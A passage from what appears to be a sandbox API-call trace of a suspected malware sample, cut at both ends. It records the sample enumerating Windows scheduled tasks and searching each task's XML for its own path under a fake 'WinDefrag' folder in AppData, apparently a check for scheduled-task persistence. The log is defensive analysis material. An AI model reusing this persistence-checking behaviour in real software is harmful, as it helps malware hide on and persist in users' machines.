PT15S\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n 7\r\n PT0S\r\n true\r\n \r\n \r\n \r\n {45F26E9E-6199-477F-85DA-AF1EDfE067B1}\r\n \r\n \r\n") returned 0x0 [0260.552] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GRGWGX;;;IU)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\SessionAgent\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1202)\r\n \r\n \r\n \r\n true\r\n PT15S\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n 7\r\n PT0S\r\n true\r\n \r\n \r\n \r\n {45F26E9E-6199-477F-85DA-AF1EDfE067B1}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0260.589] IUnknown:Release (This=0x457fd0) returned 0x0 [0260.590] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0260.590] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="SystemDataProviders") returned 0x0 [0260.590] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;GRGWGX;;;LS)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\SystemDataProviders\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1200)\r\n \r\n \r\n \r\n true\r\n PT30S\r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n 7\r\n PT0S\r\n true\r\n \r\n \r\n \r\n {7CCA6768-8373-4D28-8876-83E8B4E3A969}\r\n \r\n \r\n") returned 0x0 [0260.592] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;GRGWGX;;;LS)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\SystemDataProviders\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1200)\r\n \r\n \r\n \r\n true\r\n PT30S\r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n 7\r\n PT0S\r\n true\r\n \r\n \r\n \r\n {7CCA6768-8373-4D28-8876-83E8B4E3A969}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0260.631] IUnknown:Release (This=0x457fd0) returned 0x0 [0260.631] IUnknown:Release (This=0x456b40) returned 0x0 [0260.631] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x456b40) returned 0x0 [0260.633] ITaskFolderCollection:get_Count (in: This=0x456b40, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0260.633] IUnknown:Release (This=0x456b40) returned 0x0 [0260.633] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0260.633] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1f, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0260.633] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x457fd0) returned 0x0 [0260.635] IRegisteredTaskCollection:get_Count (in: This=0x457fd0, pCount=0x1edc70 | out: pCount=0x1edc70*=1) returned 0x0 [0260.635] IRegisteredTaskCollection:get_Item (in: This=0x457fd0, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x4580a0) returned 0x0 [0260.635] IRegisteredTask:get_Name (in: This=0x4580a0, pName=0x1edb10 | out: pName=0x1edb10*="SvcRestartTask") returned 0x0 [0260.635] IRegisteredTask:get_Xml (in: This=0x4580a0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n \\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)\r\n 1.0\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-201)\r\n \r\n \r\n \r\n 2004-01-01T00:00:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-20\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n true\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n PT1M\r\n 3\r\n \r\n \r\n \r\n \r\n sc.exe\r\n start sppsvc\r\n \r\n \r\n") returned 0x0 [0260.638] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)\r\n 1.0\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-201)\r\n \r\n \r\n \r\n 2004-01-01T00:00:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-20\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n true\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n PT1M\r\n 3\r\n \r\n \r\n \r\n \r\n sc.exe\r\n start sppsvc\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0260.679] IUnknown:Release (This=0x4580a0) returned 0x0 [0260.679] IUnknown:Release (This=0x457fd0) returned 0x0 [0260.679] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x457fd0) returned 0x0 [0260.681] ITaskFolderCollection:get_Count (in: This=0x457fd0, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0260.681] IUnknown:Release (This=0x457fd0) returned 0x0 [0260.681] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0260.681] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x20, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0260.681] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x456b40) returned 0x0 [0260.682] IRegisteredTaskCollection:get_Count (in: This=0x456b40, pCount=0x1edc70 | out: pCount=0x1edc70*=0) returned 0x0 [0260.682] IUnknown:Release (This=0x456b40) returned 0x0 [0260.682] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x456b40) returned 0x0 [0260.683] ITaskFolderCollection:get_Count (in: This=0x456b40, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0260.683] IUnknown:Release (This=0x456b40) returned 0x0 [0260.683] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0260.683] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x21, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0260.683] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x456b40) returned 0x0 [0260.685] IRegisteredTaskCollection:get_Count (in: This=0x456b40, pCount=0x1edc70 | out: pCount=0x1edc70*=1) returned 0x0 [0260.685] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x458030) returned 0x0 [0260.685] IRegisteredTask:get_Name (in: This=0x458030, pName=0x1edb10 | out: pName=0x1edb10*="SR") returned 0x0 [0260.685] IRegisteredTask:get_Xml (in: This=0x458030, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n $(@%systemroot%\\system32\\srrstr.dll,-320)\r\n $(@%systemroot%\\system32\\srrstr.dll,-321)\r\n $(@%systemroot%\\system32\\srrstr.dll,-322)\r\n Microsoft\\Windows\\SystemRestore\\SR\r\n \r\n \r\n \r\n 2005-06-14T00:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n PT30M\r\n true\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT23H\r\n false\r\n false\r\n \r\n true\r\n true\r\n IgnoreNew\r\n true\r\n false\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n /d srrstr.dll,ExecuteScheduledSPPCreation\r\n \r\n \r\n") returned 0x0 [0260.687] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\srrstr.dll,-320)\r\n $(@%systemroot%\\system32\\srrstr.dll,-321)\r\n $(@%systemroot%\\system32\\srrstr.dll,-322)\r\n Microsoft\\Windows\\SystemRestore\\SR\r\n \r\n \r\n \r\n 2005-06-14T00:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n PT30M\r\n true\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT23H\r\n false\r\n false\r\n \r\n true\r\n true\r\n IgnoreNew\r\n true\r\n false\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n /d srrstr.dll,ExecuteScheduledSPPCreation\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0260.721] IUnknown:Release (This=0x458030) returned 0x0 [0260.721] IUnknown:Release (This=0x456b40) returned 0x0 [0260.721] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x456b40) returned 0x0 [0260.722] ITaskFolderCollection:get_Count (in: This=0x456b40, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0260.722] IUnknown:Release (This=0x456b40) returned 0x0 [0260.722] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0260.722] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x22, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0260.722] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x456b40) returned 0x0 [0260.724] IRegisteredTaskCollection:get_Count (in: This=0x456b40, pCount=0x1edc70 | out: pCount=0x1edc70*=1) returned 0x0 [0260.724] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0260.724] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="Interactive") returned 0x0 [0260.724] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n $(@%systemroot%\\system32\\wdc.dll,-10041)\r\n 1.0\r\n $(@%systemroot%\\system32\\wdc.dll,-10042)\r\n Microsoft\\Windows\\Task Manager\\Interactive\r\n $(@%systemroot%\\system32\\wdc.dll,-10043)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)\r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n 5\r\n true\r\n \r\n \r\n \r\n S-1-5-4\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {855fec53-d2e4-4999-9e87-3414e9cf0ff4}\r\n \r\n \r\n \r\n") returned 0x0 [0260.727] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\wdc.dll,-10041)\r\n 1.0\r\n $(@%systemroot%\\system32\\wdc.dll,-10042)\r\n Microsoft\\Windows\\Task Manager\\Interactive\r\n $(@%systemroot%\\system32\\wdc.dll,-10043)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)\r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n 5\r\n true\r\n \r\n \r\n \r\n S-1-5-4\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {855fec53-d2e4-4999-9e87-3414e9cf0ff4}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0260.753] IUnknown:Release (This=0x457fd0) returned 0x0 [0260.753] IUnknown:Release (This=0x456b40) returned 0x0 [0260.753] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x456b40) returned 0x0 [0260.755] ITaskFolderCollection:get_Count (in: This=0x456b40, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0260.755] IUnknown:Release (This=0x456b40) returned 0x0 [0260.755] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0260.755] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x23, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0260.755] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x456b40) returned 0x0 [0260.757] IRegisteredTaskCollection:get_Count (in: This=0x456b40, pCount=0x1edc70 | out: pCount=0x1edc70*=2) returned 0x0 [0260.757] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0260.757] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="IpAddressConflict1") returned 0x0 [0260.757] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n \\Microsoft\\Windows\\Tcpip\\IpAddressConflict1\r\n 2006-02-23T15:00:57\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Tcpip'] and EventID=4198]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem\r\n \r\n \r\n") returned 0x0 [0260.760] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Tcpip\\IpAddressConflict1\r\n 2006-02-23T15:00:57\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Tcpip'] and EventID=4198]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0260.799] IUnknown:Release (This=0x457fd0) returned 0x0 [0260.799] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0260.799] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="IpAddressConflict2") returned 0x0 [0260.799] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n \\Microsoft\\Windows\\Tcpip\\IpAddressConflict2\r\n 2006-02-23T15:00:57\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)\r\n \r\n \r\n \r\n 2006-02-23T16:27:43\r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Tcpip'] and EventID=4199]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem\r\n \r\n \r\n") returned 0x0 [0260.802] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Tcpip\\IpAddressConflict2\r\n 2006-02-23T15:00:57\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)\r\n \r\n \r\n \r\n 2006-02-23T16:27:43\r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Tcpip'] and EventID=4199]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0260.841] IUnknown:Release (This=0x457fd0) returned 0x0 [0260.841] IUnknown:Release (This=0x456b40) returned 0x0 [0260.841] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x456b40) returned 0x0 [0260.843] ITaskFolderCollection:get_Count (in: This=0x456b40, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0260.843] IUnknown:Release (This=0x456b40) returned 0x0 [0260.843] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0260.843] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x24, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0260.843] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x457fd0) returned 0x0 [0260.845] IRegisteredTaskCollection:get_Count (in: This=0x457fd0, pCount=0x1edc70 | out: pCount=0x1edc70*=1) returned 0x0 [0260.845] IRegisteredTaskCollection:get_Item (in: This=0x457fd0, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x4580a0) returned 0x0 [0260.845] IRegisteredTask:get_Name (in: This=0x4580a0, pName=0x1edb10 | out: pName=0x1edb10*="MsCtfMonitor") returned 0x0 [0260.845] IRegisteredTask:get_Xml (in: This=0x4580a0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n $(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1000)\r\n Microsoft\\Windows\\TextServicesFramework\\MsCtfMonitor\r\n $(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1001)\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n {01575cfe-9a55-4003-a5e1-f38d1ebdcbe1}\r\n \r\n \r\n") returned 0x0 [0260.848] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n $(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1000)\r\n Microsoft\\Windows\\TextServicesFramework\\MsCtfMonitor\r\n $(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1001)\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n {01575cfe-9a55-4003-a5e1-f38d1ebdcbe1}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0260.882] IUnknown:Release (This=0x4580a0) returned 0x0 [0260.882] IUnknown:Release (This=0x457fd0) returned 0x0 [0260.882] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x457fd0) returned 0x0 [0260.884] ITaskFolderCollection:get_Count (in: This=0x457fd0, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0260.884] IUnknown:Release (This=0x457fd0) returned 0x0 [0260.884] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0260.884] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x25, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0260.884] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x457fd0) returned 0x0 [0260.886] IRegisteredTaskCollection:get_Count (in: This=0x457fd0, pCount=0x1edc70 | out: pCount=0x1edc70*=1) returned 0x0 [0260.886] IRegisteredTaskCollection:get_Item (in: This=0x457fd0, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x458090) returned 0x0 [0260.886] IRegisteredTask:get_Name (in: This=0x458090, pName=0x1edb10 | out: pName=0x1edb10*="SynchronizeTime") returned 0x0 [0260.886] IRegisteredTask:get_Xml (in: This=0x458090, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n $(@%systemroot%\\system32\\w32time.dll,-200)\r\n $(@%systemroot%\\system32\\w32time.dll,-202)\r\n $(@%systemroot%\\system32\\w32time.dll,-201)\r\n Microsoft\\Windows\\Time Synchronization\\SynchronizeTime\r\n \r\n \r\n \r\n 2005-01-01T01:00:00\r\n true\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n true\r\n true\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\sc.exe\r\n start w32time task_started\r\n \r\n \r\n") returned 0x0 [0260.889] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\w32time.dll,-200)\r\n $(@%systemroot%\\system32\\w32time.dll,-202)\r\n $(@%systemroot%\\system32\\w32time.dll,-201)\r\n Microsoft\\Windows\\Time Synchronization\\SynchronizeTime\r\n \r\n \r\n \r\n 2005-01-01T01:00:00\r\n true\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n true\r\n true\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\sc.exe\r\n start w32time task_started\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0260.929] IUnknown:Release (This=0x458090) returned 0x0 [0260.929] IUnknown:Release (This=0x457fd0) returned 0x0 [0260.929] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x457fd0) returned 0x0 [0260.930] ITaskFolderCollection:get_Count (in: This=0x457fd0, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0260.930] IUnknown:Release (This=0x457fd0) returned 0x0 [0260.931] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0260.931] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x26, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0260.931] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x456b40) returned 0x0 [0260.933] IRegisteredTaskCollection:get_Count (in: This=0x456b40, pCount=0x1edc70 | out: pCount=0x1edc70*=1) returned 0x0 [0260.933] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0260.933] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: 